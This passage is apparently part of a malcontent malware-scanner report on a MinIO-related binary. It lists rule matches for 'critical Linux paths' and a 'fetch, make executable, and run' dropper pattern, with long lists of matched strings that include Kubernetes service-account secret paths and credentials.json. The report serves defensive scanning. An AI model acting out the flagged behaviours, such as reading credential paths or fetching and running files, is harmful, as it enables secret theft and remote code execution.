[/proc/version_signatureexec](https://github.com/search?q=%2Fproc%2Fversion_signatureexec&type=code)
[/proc/versionno](https://github.com/search?q=%2Fproc%2Fversionno&type=code)
[/sys/class/block/run/udev/data/bxfs-error-](https://github.com/search?q=%2Fsys%2Fclass%2Fblock%2Frun%2Fudev%2Fdata%2Fbxfs-error-&type=code)
[/sys/class/dmi/id/product_nameinvalid](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_nameinvalid&type=code)
[/sys/class/dmi/id/product_uuid](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_uuid&type=code)
[/sys/devices/system/cpumismatching](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fcpumismatching&type=code)
[/tmp/.trashDecomCopyDeleteMarkerDecom](https://github.com/search?q=%2Ftmp%2F.trashDecomCopyDeleteMarkerDecom&type=code)
[/tmp/dest/](https://github.com/search?q=%2Ftmp%2Fdest%2F&type=code)
[/tmp/dir/](https://github.com/search?q=%2Ftmp%2Fdir%2F&type=code)
[/tmp/hello-world.go](https://github.com/search?q=%2Ftmp%2Fhello-world.go&type=code)
[/tmp/myminio-iam-info.zip](https://github.com/search?q=%2Ftmp%2Fmyminio-iam-info.zip&type=code)
[/tmp/mysql.sockclientFoundRowsmultiSt](https://github.com/search?q=%2Ftmp%2Fmysql.sockclientFoundRowsmultiSt&type=code)
[/tmp/policy.json.](https://github.com/search?q=%2Ftmp%2Fpolicy.json.&type=code)
[/tmp/this/new/dir1](https://github.com/search?q=%2Ftmp%2Fthis%2Fnew%2Fdir1&type=code)
[/tmp/writeonly.json](https://github.com/search?q=%2Ftmp%2Fwriteonly.json&type=code)
[/usr/bin/env](https://github.com/search?q=%2Fusr%2Fbin%2Fenv&type=code)
[/usr/bin/lsb_releaseenterpriseenterprise](https://github.com/search?q=%2Fusr%2Fbin%2Flsb_releaseenterpriseenterprise&type=code)
[/usr/bin/lxc-versiongogoproto.protosizer](https://github.com/search?q=%2Fusr%2Fbin%2Flxc-versiongogoproto.protosizer&type=code)
[/usr/bin/raspi-config/sys/fs/cgroup/memo](https://github.com/search?q=%2Fusr%2Fbin%2Fraspi-config%2Fsys%2Ffs%2Fcgroup%2Fmemo&type=code)
[/var/run/console.sock](https://github.com/search?q=%2Fvar%2Frun%2Fconsole.sock&type=code)
[/var/run/log/definitionsinvalid](https://github.com/search?q=%2Fvar%2Frun%2Flog%2Fdefinitionsinvalid&type=code)
[/var/run/secrets/kubernetes.io/serviceac](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceac&type=code)
[/var/run/syslogschema](https://github.com/search?q=%2Fvar%2Frun%2Fsyslogschema&type=code)
[sysctl](https://github.com/search?q=sysctl&type=code) |
+| MEDIUM | [combo/degrader/linux_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/degrader/linux_paths.yara#linux_critical_system_paths) | accesses multiple critical Linux paths | [/etc/selinux/config/v3/speedtest/drive/v3/pr](https://github.com/search?q=%2Fetc%2Fselinux%2Fconfig%2Fv3%2Fspeedtest%2Fdrive%2Fv3%2Fpr&type=code)
[/sys/class/block/run/udev/data/bxfs-error-](https://github.com/search?q=%2Fsys%2Fclass%2Fblock%2Frun%2Fudev%2Fdata%2Fbxfs-error-&type=code)
[/sys/class/dmi/id/product_nameinvalid](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_nameinvalid&type=code)
[/sys/class/dmi/id/product_uuid](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_uuid&type=code)
[/sys/devices/system/cpumismatching](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fcpumismatching&type=code)
[/tmp/.trashDecomCopyDeleteMarkerDecom](https://github.com/search?q=%2Ftmp%2F.trashDecomCopyDeleteMarkerDecom&type=code)
[/tmp/dest/](https://github.com/search?q=%2Ftmp%2Fdest%2F&type=code)
[/tmp/dir/](https://github.com/search?q=%2Ftmp%2Fdir%2F&type=code)
[/tmp/hello-world.go](https://github.com/search?q=%2Ftmp%2Fhello-world.go&type=code)
[/tmp/myminio-iam-info.zip](https://github.com/search?q=%2Ftmp%2Fmyminio-iam-info.zip&type=code)
[/tmp/mysql.sockclientFoundRowsmultiSt](https://github.com/search?q=%2Ftmp%2Fmysql.sockclientFoundRowsmultiSt&type=code)
[/tmp/policy.json.](https://github.com/search?q=%2Ftmp%2Fpolicy.json.&type=code)
[/tmp/this/new/dir1](https://github.com/search?q=%2Ftmp%2Fthis%2Fnew%2Fdir1&type=code)
[/tmp/writeonly.json](https://github.com/search?q=%2Ftmp%2Fwriteonly.json&type=code)
[/var/run/console.sock](https://github.com/search?q=%2Fvar%2Frun%2Fconsole.sock&type=code)
[/var/run/log/definitionsinvalid](https://github.com/search?q=%2Fvar%2Frun%2Flog%2Fdefinitionsinvalid&type=code)
[/var/run/secrets/kubernetes.io/serviceac](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceac&type=code)
[/var/run/syslogschema](https://github.com/search?q=%2Fvar%2Frun%2Fsyslogschema&type=code)
[sysctl](https://github.com/search?q=sysctl&type=code) |
 | MEDIUM | [combo/dropper/shell](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/dropper/shell.yara#curl_chmod_relative_run) | may fetch file, make it executable, and run it | [./action](https://github.com/search?q=.%2Faction&type=code)
[./agent-base](https://github.com/search?q=.%2Fagent-base&type=code)
[./alt](https://github.com/search?q=.%2Falt&type=code)
[./annotation](https://github.com/search?q=.%2Fannotation&type=code)
[./api/errors](https://github.com/search?q=.%2Fapi%2Ferrors&type=code)
[./array.js](https://github.com/search?q=.%2Farray.js&type=code)
[./ascending.js](https://github.com/search?q=.%2Fascending.js&type=code)
[./ast-to-react.js](https://github.com/search?q=.%2Fast-to-react.js&type=code)
[./attach-listener](https://github.com/search?q=.%2Fattach-listener&type=code)
[./attach-shared-listeners](https://github.com/search?q=.%2Fattach-shared-listeners&type=code)
[./azure-regions](https://github.com/search?q=.%2Fazure-regions&type=code)
[./base](https://github.com/search?q=.%2Fbase&type=code)
[./basis.js](https://github.com/search?q=.%2Fbasis.js&type=code)
[./batch](https://github.com/search?q=.%2Fbatch&type=code)
[./be](https://github.com/search?q=.%2Fbe&type=code)
[./bisector.js](https://github.com/search?q=.%2Fbisector.js&type=code)
[./blank-line.js](https://github.com/search?q=.%2Fblank-line.js&type=code)
[./blockquote.js](https://github.com/search?q=.%2Fblockquote.js&type=code)
[./break.js](https://github.com/search?q=.%2Fbreak.js&type=code)
[./canvas.js](https://github.com/search?q=.%2Fcanvas.js&type=code)
[./case-sensitive-transform.js](https://github.com/search?q=.%2Fcase-sensitive-transform.js&type=code)
[./cjs/react-dom.development.js](https://github.com/search?q=.%2Fcjs%2Freact-dom.development.js&type=code)
[./cjs/react-dom.production.min.js](https://github.com/search?q=.%2Fcjs%2Freact-dom.production.min.js&type=code)
[./cjs/react-is.development.js](https://github.com/search?q=.%2Fcjs%2Freact-is.development.js&type=code)
[./cjs/react-is.production.min.js](https://github.com/search?q=.%2Fcjs%2Freact-is.production.min.js&type=code)
[./cjs/react.development.js](https://github.com/search?q=.%2Fcjs%2Freact.development.js&type=code)
[./cjs/react.production.min.js](https://github.com/search?q=.%2Fcjs%2Freact.production.min.js&type=code)
[./cjs/scheduler.development.js](https://github.com/search?q=.%2Fcjs%2Fscheduler.development.js&type=code)
[./cjs/scheduler.production.min.js](https://github.com/search?q=.%2Fcjs%2Fscheduler.production.min.js&type=code)
[./code.js](https://github.com/search?q=.%2Fcode.js&type=code)
[./color.js](https://github.com/search?q=.%2Fcolor.js&type=code)
[./common/api](https://github.com/search?q=.%2Fcommon%2Fapi&type=code)
[./common/types](https://github.com/search?q=.%2Fcommon%2Ftypes&type=code)
[./common/utils](https://github.com/search?q=.%2Fcommon%2Futils&type=code)
[./comparator](https://github.com/search?q=.%2Fcomparator&type=code)
[./complex-types.js](https://github.com/search?q=.%2Fcomplex-types.js&type=code)
[./components/connect](https://github.com/search?q=.%2Fcomponents%2Fconnect&type=code)
[./config](https://github.com/search?q=.%2Fconfig&type=code)
[./constant.js](https://github.com/search?q=.%2Fconstant.js&type=code)
[./constants.js](https://github.com/search?q=.%2Fconstants.js&type=code)
[./constructors/css](https://github.com/search?q=.%2Fconstructors%2Fcss&type=code)
[./constructors/keyframes](https://github.com/search?q=.%2Fconstructors%2Fkeyframes&type=code)
[./constructs.js](https://github.com/search?q=.%2Fconstructs.js&type=code)
[./content](https://github.com/search?q=.%2Fcontent&type=code)
[./context](https://github.com/search?q=.%2Fcontext&type=code)
[./continuous.js](https://github.com/search?q=.%2Fcontinuous.js&type=code)
[./conversions.js](https://github.com/search?q=.%2Fconversions.js&type=code)
[./create-or-join](https://github.com/search?q=.%2Fcreate-or-join&type=code)
[./create-tokenizer.js](https://github.com/search?q=.%2Fcreate-tokenizer.js&type=code)
[./credentials.json](https://github.com/search?q=.%2Fcredentials.json&type=code)
[./css](https://github.com/search?q=.%2Fcss&type=code)
[./curve/linear.js](https://github.com/search?q=.%2Fcurve%2Flinear.js&type=code)
[./data/ play/another-bucket/](https://github.com/search?q=.%2Fdata%2F+play%2Fanother-bucket%2F&type=code)
[./date.js](https://github.com/search?q=.%2Fdate.js&type=code)
[./datetime.js](https://github.com/search?q=.%2Fdatetime.js&type=code)
[./day.js](https://github.com/search?q=.%2Fday.js&type=code)
[./debounce](https://github.com/search?q=.%2Fdebounce&type=code)
[./define.js](https://github.com/search?q=.%2Fdefine.js&type=code)
[./defined-info.js](https://github.com/search?q=.%2Fdefined-info.js&type=code)
[./delete.js](https://github.com/search?q=.%2Fdelete.js&type=code)
[./descending.js](https://github.com/search?q=.%2Fdescending.js&type=code)
[./digits.js](https://github.com/search?q=.%2Fdigits.js&type=code)
[./display/](https://github.com/search?q=.%2Fdisplay%2F&type=code)
[./dom](https://github.com/search?q=.%2Fdom&type=code)
[./draw](https://github.com/search?q=.%2Fdraw&type=code)
[./duration.js](https://github.com/search?q=.%2Fduration.js&type=code)
[./easing](https://github.com/search?q=.%2Feasing&type=code)
[./editor.js](https://github.com/search?q=.%2Feditor.js&type=code)
[./editor/editor.js](https://github.com/search?q=.%2Feditor%2Feditor.js&type=code)
[./emphasis.js](https://github.com/search?q=.%2Femphasis.js&type=code)
[./empties](https://github.com/search?q=.%2Fempties&type=code)
[./english.js](https://github.com/search?q=.%2Fenglish.js&type=code)
[./entities/create](https://github.com/search?q=.%2Fentities%2Fcreate&type=code)
[./entities/models](https://github.com/search?q=.%2Fentities%2Fmodels&type=code)
[./equals](https://github.com/search?q=.%2Fequals&type=code)
[./errors.js](https://github.com/search?q=.%2Ferrors.js&type=code)
[./eval](https://github.com/search?q=.%2Feval&type=code)
[./exceptions](https://github.com/search?q=.%2Fexceptions&type=code)
[./exponent.js](https://github.com/search?q=.%2Fexponent.js&type=code)
[./exports](https://github.com/search?q=.%2Fexports&type=code)
[./fetch](https://github.com/search?q=.%2Ffetch&type=code)
[./file](https://github.com/search?q=.%2Ffile&type=code)
[./font](https://github.com/search?q=.%2Ffont&type=code)
[./footer.js](https://github.com/search?q=.%2Ffooter.js&type=code)
[./footnote-reference.js](https://github.com/search?q=.%2Ffootnote-reference.js&type=code)
[./footnote.js](https://github.com/search?q=.%2Ffootnote.js&type=code)
[./formats.js](https://github.com/search?q=.%2Fformats.js&type=code)
[./formatter.js](https://github.com/search?q=.%2Fformatter.js&type=code)
[./freetext.js](https://github.com/search?q=.%2Ffreetext.js&type=code)
[./gcs-regions](https://github.com/search?q=.%2Fgcs-regions&type=code)
[./get-url](https://github.com/search?q=.%2Fget-url&type=code)
[./globals](https://github.com/search?q=.%2Fglobals&type=code)
[./greatest.js](https://github.com/search?q=.%2Fgreatest.js&type=code)
[./handlers/index.js](https://github.com/search?q=.%2Fhandlers%2Findex.js&type=code)
[./hash](https://github.com/search?q=.%2Fhash&type=code)
[./heading.js](https://github.com/search?q=.%2Fheading.js&type=code)
[./heartbeat](https://github.com/search?q=.%2Fheartbeat&type=code)
[./highlight.js](https://github.com/search?q=.%2Fhighlight.js&type=code)
[./history](https://github.com/search?q=.%2Fhistory&type=code)
[./hooks](https://github.com/search?q=.%2Fhooks&type=code)
[./hour.js](https://github.com/search?q=.%2Fhour.js&type=code)
[./html.js](https://github.com/search?q=.%2Fhtml.js&type=code)
[./identity.js](https://github.com/search?q=.%2Fidentity.js&type=code)
[./image-reference.js](https://github.com/search?q=.%2Fimage-reference.js&type=code)
[./image.js](https://github.com/search?q=.%2Fimage.js&type=code)
[./images/background.svg](https://github.com/search?q=.%2Fimages%2Fbackground.svg&type=code)
[./impl/conversions.js](https://github.com/search?q=.%2Fimpl%2Fconversions.js&type=code)
[./impl/diff.js](https://github.com/search?q=.%2Fimpl%2Fdiff.js&type=code)
[./impl/formats.js](https://github.com/search?q=.%2Fimpl%2Fformats.js&type=code)
[./impl/formatter.js](https://github.com/search?q=.%2Fimpl%2Fformatter.js&type=code)
[./impl/invalid.js](https://github.com/search?q=.%2Fimpl%2Finvalid.js&type=code)
[./impl/locale.js](https://github.com/search?q=.%2Fimpl%2Flocale.js&type=code)
[./impl/util.js](https://github.com/search?q=.%2Fimpl%2Futil.js&type=code)
[./implementation](https://github.com/search?q=.%2Fimplementation&type=code)
[./index.css](https://github.com/search?q=.%2Findex.css&type=code)
[./index.html](https://github.com/search?q=.%2Findex.html&type=code)
[./index.js](https://github.com/search?q=.%2Findex.js&type=code)
[./info.js](https://github.com/search?q=.%2Finfo.js&type=code)
[./init.js](https://github.com/search?q=.%2Finit.js&type=code)
[./initialize/content.js](https://github.com/search?q=.%2Finitialize%2Fcontent.js&type=code)
[./initialize/document.js](https://github.com/search?q=.%2Finitialize%2Fdocument.js&type=code)
[./initialize/flow.js](https://github.com/search?q=.%2Finitialize%2Fflow.js&type=code)
[./initialize/text.js](https://github.com/search?q=.%2Finitialize%2Ftext.js&type=code)
[./ink.js](https://github.com/search?q=.%2Fink.js&type=code)
[./inline-code.js](https://github.com/search?q=.%2Finline-code.js&type=code)
[./inspect-input.txt](https://github.com/search?q=.%2Finspect-input.txt&type=code)
[./interfaces](https://github.com/search?q=.%2Finterfaces&type=code)
[./internal](https://github.com/search?q=.%2Finternal&type=code)
[./interval.js](https://github.com/search?q=.%2Finterval.js&type=code)
[./invalid.js](https://github.com/search?q=.%2Finvalid.js&type=code)
[./kbar-actions](https://github.com/search?q=.%2Fkbar-actions&type=code)
[./keys](https://github.com/search?q=.%2Fkeys&type=code)
[./label-end.js](https://github.com/search?q=.%2Flabel-end.js&type=code)
[./lib/aria.js](https://github.com/search?q=.%2Flib%2Faria.js&type=code)
[./lib/constants](https://github.com/search?q=.%2Flib%2Fconstants&type=code)
[./lib/find.js](https://github.com/search?q=.%2Flib%2Ffind.js&type=code)
[./lib/hast-to-react.js](https://github.com/search?q=.%2Flib%2Fhast-to-react.js&type=code)
[./lib/html.js](https://github.com/search?q=.%2Flib%2Fhtml.js&type=code)
[./lib/normalize.js](https://github.com/search?q=.%2Flib%2Fnormalize.js&type=code)
[./lib/svg.js](https://github.com/search?q=.%2Flib%2Fsvg.js&type=code)
[./lib/types](https://github.com/search?q=.%2Flib%2Ftypes&type=code)
[./lib/unicode-punctuation-regex.js](https://github.com/search?q=.%2Flib%2Funicode-punctuation-regex.js&type=code)
[./lib/use-event-source](https://github.com/search?q=.%2Flib%2Fuse-event-source&type=code)
[./lib/use-socket-io](https://github.com/search?q=.%2Flib%2Fuse-socket-io&type=code)
[./lib/use-websocket](https://github.com/search?q=.%2Flib%2Fuse-websocket&type=code)
[./lib/util/info.js](https://github.com/search?q=.%2Flib%2Futil%2Finfo.js&type=code)
[./lib/util/merge.js](https://github.com/search?q=.%2Flib%2Futil%2Fmerge.js&type=code)
[./lib/util/schema.js](https://github.com/search?q=.%2Flib%2Futil%2Fschema.js&type=code)
[./lib/xlink.js](https://github.com/search?q=.%2Flib%2Fxlink.js&type=code)
[./lib/xml.js](https://github.com/search?q=.%2Flib%2Fxml.js&type=code)
[./lib/xmlns.js](https://github.com/search?q=.%2Flib%2Fxmlns.js&type=code)
[./line.js](https://github.com/search?q=.%2Fline.js&type=code)
[./linear.js](https://github.com/search?q=.%2Flinear.js&type=code)
[./link-reference.js](https://github.com/search?q=.%2Flink-reference.js&type=code)
[./link.js](https://github.com/search?q=.%2Flink.js&type=code)
[./list-item.js](https://github.com/search?q=.%2Flist-item.js&type=code)
[./list.js](https://github.com/search?q=.%2Flist.js&type=code)
[./locale.js](https://github.com/search?q=.%2Flocale.js&type=code)
[./log.js](https://github.com/search?q=.%2Flog.js&type=code)
[./login.types](https://github.com/search?q=.%2Flogin.types&type=code)
[./login.utils](https://github.com/search?q=.%2Flogin.utils&type=code)
[./manage-subscribers](https://github.com/search?q=.%2Fmanage-subscribers&type=code)
[./manifest.json](https://github.com/search?q=.%2Fmanifest.json&type=code)
[./map](https://github.com/search?q=.%2Fmap&type=code)
[./matchers](https://github.com/search?q=.%2Fmatchers&type=code)
[./math.js](https://github.com/search?q=.%2Fmath.js&type=code)
[./max.js](https://github.com/search?q=.%2Fmax.js&type=code)
[./memoize](https://github.com/search?q=.%2Fmemoize&type=code)
[./metadata.js](https://github.com/search?q=.%2Fmetadata.js&type=code)
[./millisecond.js](https://github.com/search?q=.%2Fmillisecond.js&type=code)
[./min.js](https://github.com/search?q=.%2Fmin.js&type=code)
[./minio.license](https://github.com/search?q=.%2Fminio.license&type=code)
[./minpath.js](https://github.com/search?q=.%2Fminpath.js&type=code)
[./minproc.js](https://github.com/search?q=.%2Fminproc.js&type=code)
[./minurl.js](https://github.com/search?q=.%2Fminurl.js&type=code)
[./minurl.shared.js](https://github.com/search?q=.%2Fminurl.shared.js&type=code)
[./minute.js](https://github.com/search?q=.%2Fminute.js&type=code)
[./month.js](https://github.com/search?q=.%2Fmonth.js&type=code)
[./nanoid](https://github.com/search?q=.%2Fnanoid&type=code)
[./network.js](https://github.com/search?q=.%2Fnetwork.js&type=code)
[./nice.js](https://github.com/search?q=.%2Fnice.js&type=code)
[./node](https://github.com/search?q=.%2Fnode&type=code)
[./none.js](https://github.com/search?q=.%2Fnone.js&type=code)
[./noop.js](https://github.com/search?q=.%2Fnoop.js&type=code)
[./normalize.js](https://github.com/search?q=.%2Fnormalize.js&type=code)
[./now](https://github.com/search?q=.%2Fnow&type=code)
[./number.js](https://github.com/search?q=.%2Fnumber.js&type=code)
[./object.js](https://github.com/search?q=.%2Fobject.js&type=code)
[./offset/none.js](https://github.com/search?q=.%2Foffset%2Fnone.js&type=code)
[./optional](https://github.com/search?q=.%2Foptional&type=code)
[./order/none.js](https://github.com/search?q=.%2Forder%2Fnone.js&type=code)
[./ordinal.js](https://github.com/search?q=.%2Fordinal.js&type=code)
[./outliner.js](https://github.com/search?q=.%2Foutliner.js&type=code)
[./paragraph.js](https://github.com/search?q=.%2Fparagraph.js&type=code)
[./parse](https://github.com/search?q=.%2Fparse&type=code)
[./path.js](https://github.com/search?q=.%2Fpath.js&type=code)
[./pattern](https://github.com/search?q=.%2Fpattern&type=code)
[./pdf.js/src/display/annotation](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fannotation&type=code)
[./pdf.js/src/display/api.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fapi.js&type=code)
[./pdf.js/src/display/base](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fbase&type=code)
[./pdf.js/src/display/canvas.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fcanvas.js&type=code)
[./pdf.js/src/display/content](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fcontent&type=code)
[./pdf.js/src/display/display](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fdisplay&type=code)
[./pdf.js/src/display/draw](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fdraw&type=code)
[./pdf.js/src/display/editor/alt](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Falt&type=code)
[./pdf.js/src/display/editor/color](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Fcolor&type=code)
[./pdf.js/src/display/editor/freetext](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Ffreetext&type=code)
[./pdf.js/src/display/editor/ink.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Fink.js&type=code)
[./pdf.js/src/display/editor/outliner](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Foutliner&type=code)
[./pdf.js/src/display/editor/stamp.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Fstamp.js&type=code)
[./pdf.js/src/display/editor/tools.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Feditor%2Ftools.js&type=code)
[./pdf.js/src/display/fetch](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Ffetch&type=code)
[./pdf.js/src/display/font](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Ffont&type=code)
[./pdf.js/src/display/metadata.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fmetadata.js&type=code)
[./pdf.js/src/display/network.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fnetwork.js&type=code)
[./pdf.js/src/display/node](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fnode&type=code)
[./pdf.js/src/display/optional](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Foptional&type=code)
[./pdf.js/src/display/pattern](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fpattern&type=code)
[./pdf.js/src/display/text](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Ftext&type=code)
[./pdf.js/src/display/transport](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Ftransport&type=code)
[./pdf.js/src/display/worker](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fworker&type=code)
[./pdf.js/src/display/xfa](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fdisplay%2Fxfa&type=code)
[./pdf.js/src/shared/image](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fshared%2Fimage&type=code)
[./pdf.js/src/shared/message](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fshared%2Fmessage&type=code)
[./pdf.js/src/shared/scripting](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fshared%2Fscripting&type=code)
[./pdf.js/src/shared/util.js](https://github.com/search?q=.%2Fpdf.js%2Fsrc%2Fshared%2Futil.js&type=code)
[./pdf.js/webpack/bootstrap](https://github.com/search?q=.%2Fpdf.js%2Fwebpack%2Fbootstrap&type=code)
[./pdf.worker.js](https://github.com/search?q=.%2Fpdf.worker.js&type=code)
[./pdf.worker.mjs](https://github.com/search?q=.%2Fpdf.worker.mjs&type=code)
[./permissions](https://github.com/search?q=.%2Fpermissions&type=code)
[./permute.js](https://github.com/search?q=.%2Fpermute.js&type=code)
[./placeholderimage.png](https://github.com/search?q=.%2Fplaceholderimage.png&type=code)
[./plugins/all](https://github.com/search?q=.%2Fplugins%2Fall&type=code)
[./plugins/mapset](https://github.com/search?q=.%2Fplugins%2Fmapset&type=code)
[./plugins/patches](https://github.com/search?q=.%2Fplugins%2Fpatches&type=code)
[./point.js](https://github.com/search?q=.%2Fpoint.js&type=code)
[./polar/types](https://github.com/search?q=.%2Fpolar%2Ftypes&type=code)
[./pow.js](https://github.com/search?q=.%2Fpow.js&type=code)
[./property](https://github.com/search?q=.%2Fproperty&type=code)
[./proxy](https://github.com/search?q=.%2Fproxy&type=code)
[./quickselect.js](https://github.com/search?q=.%2Fquickselect.js&type=code)
[./range](https://github.com/search?q=.%2Frange&type=code)
[./ref](https://github.com/search?q=.%2Fref&type=code)
[./rehype-filter.js](https://github.com/search?q=.%2Frehype-filter.js&type=code)
[./replication.yaml](https://github.com/search?q=.%2Freplication.yaml&type=code)
[./request-base](https://github.com/search?q=.%2Frequest-base&type=code)
[./response-base](https://github.com/search?q=.%2Fresponse-base&type=code)
[./revert.js](https://github.com/search?q=.%2Frevert.js&type=code)
[./rgb.js](https://github.com/search?q=.%2Frgb.js&type=code)
[./root.js](https://github.com/search?q=.%2Froot.js&type=code)
[./safari-pinned-tab.svg](https://github.com/search?q=.%2Fsafari-pinned-tab.svg&type=code)
[./schema.js](https://github.com/search?q=.%2Fschema.js&type=code)
[./scripting](https://github.com/search?q=.%2Fscripting&type=code)
[./scripts/pdf.worker.min.mjs](https://github.com/search?q=.%2Fscripts%2Fpdf.worker.min.mjs&type=code)
[./second.js](https://github.com/search?q=.%2Fsecond.js&type=code)
[./sequential.js](https://github.com/search?q=.%2Fsequential.js&type=code)
[./settings.js](https://github.com/search?q=.%2Fsettings.js&type=code)
[./shams](https://github.com/search?q=.%2Fshams&type=code)
[./shared/image](https://github.com/search?q=.%2Fshared%2Fimage&type=code)
[./shared/message](https://github.com/search?q=.%2Fshared%2Fmessage&type=code)
[./shared/scripting](https://github.com/search?q=.%2Fshared%2Fscripting&type=code)
[./shared/util.js](https://github.com/search?q=.%2Fshared%2Futil.js&type=code)
[./shared/utils.js](https://github.com/search?q=.%2Fshared%2Futils.js&type=code)
[./sheet](https://github.com/search?q=.%2Fsheet&type=code)
[./socket-io](https://github.com/search?q=.%2Fsocket-io&type=code)
[./sort.js](https://github.com/search?q=.%2Fsort.js&type=code)
[./src/common/api](https://github.com/search?q=.%2Fsrc%2Fcommon%2Fapi&type=code)
[./src/display/editor/tools.js](https://github.com/search?q=.%2Fsrc%2Fdisplay%2Feditor%2Ftools.js&type=code)
[./src/keybindings](https://github.com/search?q=.%2Fsrc%2Fkeybindings&type=code)
[./src/store](https://github.com/search?q=.%2Fsrc%2Fstore&type=code)
[./stamp.js](https://github.com/search?q=.%2Fstamp.js&type=code)
[./state.js](https://github.com/search?q=.%2Fstate.js&type=code)
[./store](https://github.com/search?q=.%2Fstore&type=code)
[./string.js](https://github.com/search?q=.%2Fstring.js&type=code)
[./stringify](https://github.com/search?q=.%2Fstringify&type=code)
[./strong.js](https://github.com/search?q=.%2Fstrong.js&type=code)
[./styles/root-styles.css](https://github.com/search?q=.%2Fstyles%2Froot-styles.css&type=code)
[./symbol/asterisk.js](https://github.com/search?q=.%2Fsymbol%2Fasterisk.js&type=code)
[./symbol/circle.js](https://github.com/search?q=.%2Fsymbol%2Fcircle.js&type=code)
[./symbol/cross.js](https://github.com/search?q=.%2Fsymbol%2Fcross.js&type=code)
[./symbol/diamond.js](https://github.com/search?q=.%2Fsymbol%2Fdiamond.js&type=code)
[./symbol/plus.js](https://github.com/search?q=.%2Fsymbol%2Fplus.js&type=code)
[./symbol/square.js](https://github.com/search?q=.%2Fsymbol%2Fsquare.js&type=code)
[./symbol/star.js](https://github.com/search?q=.%2Fsymbol%2Fstar.js&type=code)
[./symbol/times.js](https://github.com/search?q=.%2Fsymbol%2Ftimes.js&type=code)
[./symbol/triangle.js](https://github.com/search?q=.%2Fsymbol%2Ftriangle.js&type=code)
[./symbol/wye.js](https://github.com/search?q=.%2Fsymbol%2Fwye.js&type=code)
[./symlog.js](https://github.com/search?q=.%2Fsymlog.js&type=code)
[./syntax](https://github.com/search?q=.%2Fsyntax&type=code)
[./sys/fs/cgroup/memory/memory.limit](https://github.com/search?q=.%2Fsys%2Ffs%2Fcgroup%2Fmemory%2Fmemory.limit&type=code)
[./sys/kernel/mm/transparent](https://github.com/search?q=.%2Fsys%2Fkernel%2Fmm%2Ftransparent&type=code)
[./table-cell.js](https://github.com/search?q=.%2Ftable-cell.js&type=code)
[./table-row.js](https://github.com/search?q=.%2Ftable-row.js&type=code)
[./table.js](https://github.com/search?q=.%2Ftable.js&type=code)
[./task](https://github.com/search?q=.%2Ftask&type=code)
[./text.js](https://github.com/search?q=.%2Ftext.js&type=code)
[./thematic-break.js](https://github.com/search?q=.%2Fthematic-break.js&type=code)
[./this.program](https://github.com/search?q=.%2Fthis.program&type=code)
[./time.js](https://github.com/search?q=.%2Ftime.js&type=code)
[./timer](https://github.com/search?q=.%2Ftimer&type=code)
[./tinykeys](https://github.com/search?q=.%2Ftinykeys&type=code)
[./toolbar.js](https://github.com/search?q=.%2Ftoolbar.js&type=code)
[./tools.js](https://github.com/search?q=.%2Ftools.js&type=code)
[./trace.log](https://github.com/search?q=.%2Ftrace.log&type=code)
[./transport](https://github.com/search?q=.%2Ftransport&type=code)
[./typeof.js](https://github.com/search?q=.%2Ftypeof.js&type=code)
[./types.js](https://github.com/search?q=.%2Ftypes.js&type=code)
[./uri-transformer.js](https://github.com/search?q=.%2Furi-transformer.js&type=code)
[./use-websocket](https://github.com/search?q=.%2Fuse-websocket&type=code)
[./util.inspect](https://github.com/search?q=.%2Futil.inspect&type=code)
[./util.js](https://github.com/search?q=.%2Futil.js&type=code)
[./util/arithmetic](https://github.com/search?q=.%2Futil%2Farithmetic&type=code)
[./util/case-insensitive-transform.js](https://github.com/search?q=.%2Futil%2Fcase-insensitive-transform.js&type=code)
[./util/case-sensitive-transform.js](https://github.com/search?q=.%2Futil%2Fcase-sensitive-transform.js&type=code)
[./util/create.js](https://github.com/search?q=.%2Futil%2Fcreate.js&type=code)
[./util/defined-info.js](https://github.com/search?q=.%2Futil%2Fdefined-info.js&type=code)
